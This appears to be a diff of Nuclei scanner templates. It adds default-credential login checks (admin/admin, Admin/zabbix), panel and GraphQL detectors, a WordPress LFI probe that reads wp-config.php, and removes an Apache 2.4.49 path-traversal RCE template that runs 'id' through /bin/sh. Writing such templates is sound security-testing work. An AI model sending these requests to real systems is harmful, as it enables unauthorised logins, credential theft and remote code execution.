|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -16,7 +16,14 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
username=admin&password=admin
|
username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,14 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=admin&password=admin
|
username={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
redirects: false
|
redirects: false
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -14,7 +14,14 @@ requests:
|
||||||
Host:{{Hostname}}
|
Host:{{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
userName=admin&password=123456
|
userName={{username}}&password={{password}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- 123456
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -7,14 +7,21 @@ info:
|
||||||
tags: zabbix,default-login
|
tags: zabbix,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/index.php'
|
POST /index.php HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
X-Requested-With: XMLHttpRequest
|
X-Requested-With: XMLHttpRequest
|
||||||
|
|
||||||
body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
|
name={{username}}&password={{password}}&autologin=1&enter=Sign+in
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- Admin
|
||||||
|
password:
|
||||||
|
- zabbix
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -24,4 +31,4 @@ requests:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 302
|
- 302
|
||||||
|
|
|
@ -9,14 +9,21 @@ info:
|
||||||
tags: zmanda,default-login
|
tags: zmanda,default-login
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
- '{{BaseURL}}/ZMC_Admin_Login'
|
POST /ZMC_Admin_Login HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Cookie: zmc_cookies_enabled=true
|
Cookie: zmc_cookies_enabled=true
|
||||||
|
|
||||||
body: login=AEE&last_page=&username=admin&password=admin&submit=Login&JS_SWITCH=JS_ON
|
login=AEE&last_page=&username={{username}}&password={{password}}&submit=Login&JS_SWITCH=JS_ON
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- admin
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
attack: pitchfork
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: adiscon-loganalyzer
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Detect exposed Adiscon LogAnalyzer
|
||||||
|
author: geeknik
|
||||||
|
severity: high
|
||||||
|
description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services.
|
||||||
|
reference: https://loganalyzer.adiscon.com/
|
||||||
|
tags: adiscon,loganalyzer,syslog,exposures
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'Adiscon LogAnalyzer'
|
||||||
|
- 'value="SYSLOG"'
|
||||||
|
- 'value="EVTRPT"'
|
||||||
|
- 'value="WEBLOG"'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: hpe-system-management-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HPE System Management Login
|
||||||
|
author: divya_mudgal
|
||||||
|
severity: info
|
||||||
|
tags: hp,tech,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cpqlogin.htm"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "HPE System Management Homepage"
|
||||||
|
- "/proxy/ssllogin"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "HPE System Management Homepage v([0-9-.]*)"
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: lansweeper-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Lansweeper Login
|
||||||
|
author: divya_mudgal
|
||||||
|
severity: info
|
||||||
|
tags: lansweeper,tech,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login.aspx"
|
||||||
|
- "{{BaseURL}}/favicon.ico"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
name: login
|
||||||
|
words:
|
||||||
|
- "Lansweeper - Login"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
name: favicon
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: electron-version-detect.yaml
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Electron Version Detect
|
||||||
|
author: me9187
|
||||||
|
severity: info
|
||||||
|
tags: electron,file
|
||||||
|
reference: https://www.electronjs.org/blog/chromium-rce-vulnerability/
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- json
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '"electronVersion":"[^"]*"'
|
|
@ -0,0 +1,17 @@
|
||||||
|
id: unauthenticated-lansweeper
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Unauthenticated Lansweeper Instance
|
||||||
|
author: divya_mudgal
|
||||||
|
severity: high
|
||||||
|
tags: lansweeper,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/Default.aspx"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Main page - Lansweeper"
|
|
@ -2,51 +2,136 @@ id: graphql-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GraphQL API Detection
|
name: GraphQL API Detection
|
||||||
author: NkxxkN,ELSFA7110
|
author: NkxxkN,ELSFA7110,@OFJAAAH
|
||||||
severity: info
|
severity: info
|
||||||
tags: tech,graphql
|
tags: tech,graphql,fuzz
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: POST
|
- method: POST
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/graphql"
|
- "{{BaseURL}}/HyperGraphQL"
|
||||||
|
- "{{BaseURL}}/___graphql"
|
||||||
|
- "{{BaseURL}}/altair"
|
||||||
|
- "{{BaseURL}}/api/cask/graphql-playground"
|
||||||
|
- "{{BaseURL}}/api/graphql"
|
||||||
|
- "{{BaseURL}}/api/graphql/v1"
|
||||||
|
- "{{BaseURL}}/explorer"
|
||||||
|
- "{{BaseURL}}/express-graphql"
|
||||||
|
- "{{BaseURL}}/graph"
|
||||||
|
- "{{BaseURL}}/graph_cms"
|
||||||
- "{{BaseURL}}/graphiql"
|
- "{{BaseURL}}/graphiql"
|
||||||
|
- "{{BaseURL}}/graphiql.css"
|
||||||
|
- "{{BaseURL}}/graphiql.js"
|
||||||
|
- "{{BaseURL}}/graphiql.min.css"
|
||||||
|
- "{{BaseURL}}/graphiql.min.js"
|
||||||
|
- "{{BaseURL}}/graphiql.php"
|
||||||
|
- "{{BaseURL}}/graphiql/finland"
|
||||||
|
- "{{BaseURL}}/graphql"
|
||||||
|
- "{{BaseURL}}/graphql-console"
|
||||||
|
- "{{BaseURL}}/graphql-devtools"
|
||||||
|
- "{{BaseURL}}/graphql-explorer"
|
||||||
|
- "{{BaseURL}}/graphql-playground"
|
||||||
|
- "{{BaseURL}}/graphql-playground-html"
|
||||||
- "{{BaseURL}}/graphql.php"
|
- "{{BaseURL}}/graphql.php"
|
||||||
- "{{BaseURL}}/graphql/console"
|
- "{{BaseURL}}/graphql/console"
|
||||||
- "{{BaseURL}}/v1"
|
- "{{BaseURL}}/graphql/graphql-playground"
|
||||||
- "{{BaseURL}}/v2"
|
- "{{BaseURL}}/graphql/schema.json"
|
||||||
- "{{BaseURL}}/v3"
|
- "{{BaseURL}}/graphql/schema.xml"
|
||||||
- "{{BaseURL}}/graphql-console"
|
- "{{BaseURL}}/graphql/schema.yaml"
|
||||||
|
- "{{BaseURL}}/graphql/v1"
|
||||||
|
- "{{BaseURL}}/je/graphql"
|
||||||
|
- "{{BaseURL}}/laravel-graphql-playground"
|
||||||
|
- "{{BaseURL}}/playground"
|
||||||
|
- "{{BaseURL}}/portal-graphql"
|
||||||
|
- "{{BaseURL}}/query"
|
||||||
|
- "{{BaseURL}}/query-api"
|
||||||
|
- "{{BaseURL}}/query-explorer"
|
||||||
- "{{BaseURL}}/query-laravel"
|
- "{{BaseURL}}/query-laravel"
|
||||||
- "{{BaseURL}}/v3/subscriptions"
|
- "{{BaseURL}}/sphinx-graphiql"
|
||||||
|
- "{{BaseURL}}/subscriptions"
|
||||||
|
- "{{BaseURL}}/v1"
|
||||||
|
- "{{BaseURL}}/v1/altair"
|
||||||
|
- "{{BaseURL}}/v1/api/graphql"
|
||||||
|
- "{{BaseURL}}/v1/explorer"
|
||||||
|
- "{{BaseURL}}/v1/graph"
|
||||||
|
- "{{BaseURL}}/v1/graphiql"
|
||||||
|
- "{{BaseURL}}/v1/graphiql.css"
|
||||||
|
- "{{BaseURL}}/v1/graphiql.js"
|
||||||
|
- "{{BaseURL}}/v1/graphiql.min.css"
|
||||||
|
- "{{BaseURL}}/v1/graphiql.min.js"
|
||||||
|
- "{{BaseURL}}/v1/graphiql.php"
|
||||||
|
- "{{BaseURL}}/v1/graphiql/finland"
|
||||||
|
- "{{BaseURL}}/v1/graphql"
|
||||||
|
- "{{BaseURL}}/v1/graphql-explorer"
|
||||||
|
- "{{BaseURL}}/v1/graphql.php"
|
||||||
|
- "{{BaseURL}}/v1/graphql/console"
|
||||||
|
- "{{BaseURL}}/v1/graphql/schema.json"
|
||||||
|
- "{{BaseURL}}/v1/graphql/schema.xml"
|
||||||
|
- "{{BaseURL}}/v1/graphql/schema.yaml"
|
||||||
|
- "{{BaseURL}}/v1/playground"
|
||||||
|
- "{{BaseURL}}/v1/subscriptions"
|
||||||
|
- "{{BaseURL}}/v2"
|
||||||
|
- "{{BaseURL}}/v2/altair"
|
||||||
|
- "{{BaseURL}}/v2/api/graphql"
|
||||||
|
- "{{BaseURL}}/v2/explorer"
|
||||||
|
- "{{BaseURL}}/v2/graph"
|
||||||
|
- "{{BaseURL}}/v2/graphiql"
|
||||||
|
- "{{BaseURL}}/v2/graphiql.css"
|
||||||
|
- "{{BaseURL}}/v2/graphiql.js"
|
||||||
|
- "{{BaseURL}}/v2/graphiql.min.css"
|
||||||
|
- "{{BaseURL}}/v2/graphiql.min.js"
|
||||||
|
- "{{BaseURL}}/v2/graphiql.php"
|
||||||
|
- "{{BaseURL}}/v2/graphiql/finland"
|
||||||
|
- "{{BaseURL}}/v2/graphql"
|
||||||
|
- "{{BaseURL}}/v2/graphql-explorer"
|
||||||
|
- "{{BaseURL}}/v2/graphql.php"
|
||||||
|
- "{{BaseURL}}/v2/graphql/console"
|
||||||
|
- "{{BaseURL}}/v2/graphql/schema.json"
|
||||||
|
- "{{BaseURL}}/v2/graphql/schema.xml"
|
||||||
|
- "{{BaseURL}}/v2/graphql/schema.yaml"
|
||||||
|
- "{{BaseURL}}/v2/playground"
|
||||||
|
- "{{BaseURL}}/v2/subscriptions"
|
||||||
|
- "{{BaseURL}}/v3"
|
||||||
|
- "{{BaseURL}}/v3/altair"
|
||||||
|
- "{{BaseURL}}/v3/api/graphql"
|
||||||
|
- "{{BaseURL}}/v3/explorer"
|
||||||
|
- "{{BaseURL}}/v3/graph"
|
||||||
|
- "{{BaseURL}}/v3/graphiql"
|
||||||
|
- "{{BaseURL}}/v3/graphiql.css"
|
||||||
|
- "{{BaseURL}}/v3/graphiql.js"
|
||||||
|
- "{{BaseURL}}/v3/graphiql.min.css"
|
||||||
|
- "{{BaseURL}}/v3/graphiql.min.js"
|
||||||
|
- "{{BaseURL}}/v3/graphiql.php"
|
||||||
|
- "{{BaseURL}}/v3/graphiql/finland"
|
||||||
|
- "{{BaseURL}}/v3/graphql"
|
||||||
|
- "{{BaseURL}}/v3/graphql-explorer"
|
||||||
|
- "{{BaseURL}}/v3/graphql.php"
|
||||||
|
- "{{BaseURL}}/v3/graphql/console"
|
||||||
|
- "{{BaseURL}}/v3/graphql/schema.json"
|
||||||
- "{{BaseURL}}/v3/graphql/schema.xml"
|
- "{{BaseURL}}/v3/graphql/schema.xml"
|
||||||
- "{{BaseURL}}/v3/graphql/schema.yaml"
|
- "{{BaseURL}}/v3/graphql/schema.yaml"
|
||||||
- "{{BaseURL}}/v3/playground"
|
- "{{BaseURL}}/v3/playground"
|
||||||
- "{{BaseURL}}/v3/graphql/schema.json"
|
- "{{BaseURL}}/v3/subscriptions"
|
||||||
- "{{BaseURL}}/graphql/schema.yaml"
|
- "{{BaseURL}}/v4/altair"
|
||||||
- "{{BaseURL}}/graphql/schema.xml"
|
- "{{BaseURL}}/v4/api/graphql"
|
||||||
- "{{BaseURL}}/graphql/schema.json"
|
- "{{BaseURL}}/v4/explorer"
|
||||||
- "{{BaseURL}}/graphiql/finland"
|
- "{{BaseURL}}/v4/graph"
|
||||||
- "{{BaseURL}}/graphiql.css"
|
- "{{BaseURL}}/v4/graphiql"
|
||||||
- "{{BaseURL}}/graphql-devtools"
|
- "{{BaseURL}}/v4/graphiql.css"
|
||||||
- "{{BaseURL}}/graphql/v1"
|
- "{{BaseURL}}/v4/graphiql.js"
|
||||||
- "{{BaseURL}}/v1/graphql"
|
- "{{BaseURL}}/v4/graphiql.min.css"
|
||||||
- "{{BaseURL}}/api/graphql/v1"
|
- "{{BaseURL}}/v4/graphiql.min.js"
|
||||||
- "{{BaseURL}}/portal-graphql"
|
- "{{BaseURL}}/v4/graphiql.php"
|
||||||
- "{{BaseURL}}/graphql-playground"
|
- "{{BaseURL}}/v4/graphiql/finland"
|
||||||
- "{{BaseURL}}/laravel-graphql-playground"
|
- "{{BaseURL}}/v4/graphql"
|
||||||
- "{{BaseURL}}/query-explorer"
|
- "{{BaseURL}}/v4/graphql-explorer"
|
||||||
- "{{BaseURL}}/sphinx-graphiql"
|
- "{{BaseURL}}/v4/graphql.php"
|
||||||
- "{{BaseURL}}/express-graphql"
|
- "{{BaseURL}}/v4/graphql/console"
|
||||||
- "{{BaseURL}}/query"
|
- "{{BaseURL}}/v4/graphql/schema.json"
|
||||||
- "{{BaseURL}}/HyperGraphQL"
|
- "{{BaseURL}}/v4/graphql/schema.xml"
|
||||||
- "{{BaseURL}}/graphql/graphql-playground"
|
- "{{BaseURL}}/v4/graphql/schema.yaml"
|
||||||
- "{{BaseURL}}/graphql-playground-html"
|
- "{{BaseURL}}/v4/playground"
|
||||||
- "{{BaseURL}}/graph_cms"
|
- "{{BaseURL}}/v4/subscriptions"
|
||||||
- "{{BaseURL}}/query-api"
|
|
||||||
- "{{BaseURL}}/api/cask/graphql-playground"
|
|
||||||
- "{{BaseURL}}/altair"
|
|
||||||
- "{{BaseURL}}/playground"
|
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
@ -65,4 +150,4 @@ requests:
|
||||||
- "__schema"
|
- "__schema"
|
||||||
- "(Introspection|INTROSPECTION|introspection).*?"
|
- "(Introspection|INTROSPECTION|introspection).*?"
|
||||||
- ".*?operation not found.*?"
|
- ".*?operation not found.*?"
|
||||||
condition: or
|
condition: or
|
||||||
|
|
|
@ -1,41 +0,0 @@
|
||||||
id: apache-httpd-rce
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Apache HTTPd - 2.4.49 (CGI enabled) RCE
|
|
||||||
author: pdteam
|
|
||||||
severity: critical
|
|
||||||
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
|
|
||||||
reference:
|
|
||||||
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
|
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
|
|
||||||
- https://twitter.com/ptswarm/status/1445376079548624899
|
|
||||||
- https://github.com/blasty/CVE-2021-41773
|
|
||||||
tags: cve,cve2021,rce,apache
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- raw:
|
|
||||||
- |
|
|
||||||
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
|
|
||||||
echo Content-Type: text/plain; echo; id
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
condition: and
|
|
||||||
part: body
|
|
||||||
words:
|
|
||||||
- 'uid='
|
|
||||||
- 'gid='
|
|
||||||
- 'groups='
|
|
||||||
|
|
||||||
extractors:
|
|
||||||
- type: regex
|
|
||||||
regex:
|
|
||||||
- "(u|g)id=.*"
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: advanced-access-manager-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/9873
|
||||||
|
- https://id.wordpress.org/plugins/advanced-access-manager/
|
||||||
|
tags: wordpress,wp-plugin,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/?aam-media=wp-config.php'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "DB_NAME"
|
||||||
|
- "DB_PASSWORD"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue